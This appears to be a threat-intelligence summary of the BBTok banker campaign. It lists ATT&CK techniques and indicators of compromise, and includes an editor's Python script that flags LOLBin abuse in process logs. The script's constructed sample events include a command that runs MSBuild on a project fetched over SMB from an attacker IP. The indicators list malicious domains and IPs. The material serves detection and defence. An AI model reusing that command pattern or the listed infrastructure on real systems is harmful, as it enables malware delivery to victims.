Check Point Research details an active BBTok banker campaign in Latin America that uses server-side components and LOLBins to deliver unique payloads per victim, evading detection across Brazil and Mexico. The report covers how infection chains are generated on demand, the bank-impersonation capabilities, and the evolution of TTPs including new exploits and obfuscation methods. #BBTok #Trammy #Gammy #Brammy #Kammy #Follina #BBTokBanker
Keypoints
- BBTok remains active in Brazil and Mexico, using multi-layered geo-fencing to restrict infections to those countries.
- Since 2020, operators have added obfuscation, additional downloaders, and varied infection chains, lowering detection rates.
- The banker can replicate interfaces for over 40 banks (e.g., Citibank Brasil, HSBC) to harvest 2FA codes and card numbers.
- A custom server-side application generates unique payloads per victim based on OS and location.
- Payload server analysis shows diversified Windows infection chains using ISO, ZIP, LNK, DOCX, JS, and XLL file types.
- Attackers incorporate open-source code and new exploits (e.g., Follina) into their toolkit and obfuscation techniques like Add-PoshObfuscation.
MITRE Techniques
- [T1566.002] Phishing – Spearphishing Link – The campaign distributes its payloads through phishing links rather than attachments; the linked pages serve decoy content alongside the lure archive. “phishing links” and decoy content are used to deliver payloads.
- [T1059.001] PowerShell – The PowerShell payload generator (ps_gen.ps1) creates and delivers the lure archives and executes payload stages. “The script ps_gen.ps1 contains the main logic for generating archive payloads”
- [T1218.011] System Binary Proxy Execution: Rundll32 – In the Windows 7 chain, rundll32.exe executes a DLL loader before the BBTok payload runs. “rundll32.exe” is used to run the loader.
- [T1105] Ingress Tool Transfer – Intermediate stages fetch DLLs and other components (e.g., Trammy, Gammy) from remote hosts during the infection chain. “downloads the relevant remote DLL via CMD execution”
- [T1027] Obfuscated/Compressed Files and Information – Add-PoshObfuscation obfuscates payloads to evade detection. “All payloads are obfuscated using the Add-PoshObfuscation function.”
- [T1127.001] Trusted Developer Utilities Proxy Execution: MSBuild – The Windows 10 chain uses MSBuild.exe to compile and execute a payload from a project XML served remotely. “MSBuild.exe creates a randomly named DLL… and runs it”
- [T1059.003] Windows Command Shell – The Windows 10 chain uses CMD commands and an SMB-based file fetch to orchestrate execution. “The XML file used by MSBuild… fetched over SMB”
- [T1204.002] User Execution: Malicious File – The infection chain starts when the victim opens an LNK file contained in the lure archive, which launches the subsequent stages. “The LNK file kicks off the infection chain”
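The three Windows 10 behaviours listed above (a shortcut launching cmd.exe, MSBuild.exe building a project addressed by a UNC path fetched over SMB, and rundll32.exe loading a DLL from a user-writable directory) are all visible in process-creation telemetry. The script below is an added example of detection logic for them, written by the editor; it is not Check Point's code. The events are constructed, the field names follow a Sysmon Event ID 1 style but are an assumption, and the host 176.31.159.196 is taken from the IoC list purely as sample data.

```python
"""Added example (editor's code, not from the Check Point report): flag
process-creation events matching the BBTok Windows 10 chain.

Assumptions: events are dicts with Sysmon-style Image / CommandLine /
ParentImage fields; the sample events below are constructed, not real."""
import re
from typing import Callable, Dict, List

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # A double-clicked LNK runs its target under explorer.exe; here cmd.exe
    # invokes MSBuild against a project on an SMB share (assumed shape).
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe \\176.31.159.196\share\proj.xml"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe \\176.31.159.196\share\proj.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\maria\AppData\Local\Temp\abcd.dll",Start',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign: a developer build and a Control Panel launch.
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\dev\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# \\host\share\file  (two literal backslashes, host, share, rest of path)
UNC_PATH = re.compile(r"\\\\[\w.-]+\\[^\s\"']+")
# Directories a standard user can write to (assumed list).
USER_WRITABLE = re.compile(r"(?i)\\(?:users|programdata|windows\\temp)\\")
# First .dll argument on a rundll32 command line, quoted or not.
DLL_ARG = re.compile(r"(?i)\"?([^\"\s]+\.dll)\"?")
LOLBIN_HINTS = ("msbuild.exe", "rundll32.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def cmd_launched_from_shortcut(ev: Dict[str, str]) -> bool:
    """cmd.exe spawned by explorer.exe (how an opened LNK runs its target)
    whose command line references a LOLBin or a UNC path."""
    if basename(ev["Image"]) != "cmd.exe" or basename(ev["ParentImage"]) != "explorer.exe":
        return False
    cl = ev["CommandLine"].lower()
    return any(h in cl for h in LOLBIN_HINTS) or bool(UNC_PATH.search(ev["CommandLine"]))


def msbuild_remote_project(ev: Dict[str, str]) -> bool:
    """MSBuild.exe building a project file addressed by UNC path (SMB fetch)."""
    return basename(ev["Image"]) == "msbuild.exe" and bool(UNC_PATH.search(ev["CommandLine"]))


def rundll32_user_writable_dll(ev: Dict[str, str]) -> bool:
    """rundll32.exe loading a DLL from a user-writable directory."""
    if basename(ev["Image"]) != "rundll32.exe":
        return False
    m = DLL_ARG.search(ev["CommandLine"])
    return bool(m and USER_WRITABLE.search(m.group(1)))


RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "lnk_launches_cmd": cmd_launched_from_shortcut,
    "msbuild_remote_project": msbuild_remote_project,
    "rundll32_user_writable_dll": rundll32_user_writable_dll,
}


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one hit per event that matches at least one rule, with the
    matching rule names in RULES order."""
    hits = []
    for i, ev in enumerate(events):
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits.append({"index": i, "image": basename(ev["Image"]), "rules": matched})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Each rule keys on the relationship between the binary, its parent and its arguments rather than on a file hash, so it still fires when the server-side generator hands a different payload to every victim. The two benign events show the false-positive boundary: MSBuild started by the IDE on a local project and rundll32 loading a system DLL are left alone.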
Indicators of Compromise
- [Domain] Phishing domains – danfe.is-certified.com, rendinfo.shop – used for credential harvesting and lure delivery
- [Domain] Malicious DLL download domain – sodkvsodkv.supplier.serveftp.net
- [IP] Payload and C2/Distribution IPs – 216.250.251.196, 173.249.196.195, 176.31.159.196, 147.124.213.152
- [File name] Lure archives and payloads – e.g., DANFE357702036539112.iso, HtmlFactura3f48daa069f0e42253194ca7b51e7481DPCYKJ4Ojk.iso
- [SHA-256] Payload and lure hashes – be36c832a1186fd752dd975d31284bdd2ac3342bd3d32980c6c52271d0d2c84c, 07028ec2a727330a3710dba8940aa97809f47e75e1fd9485d8fc52a3c018a128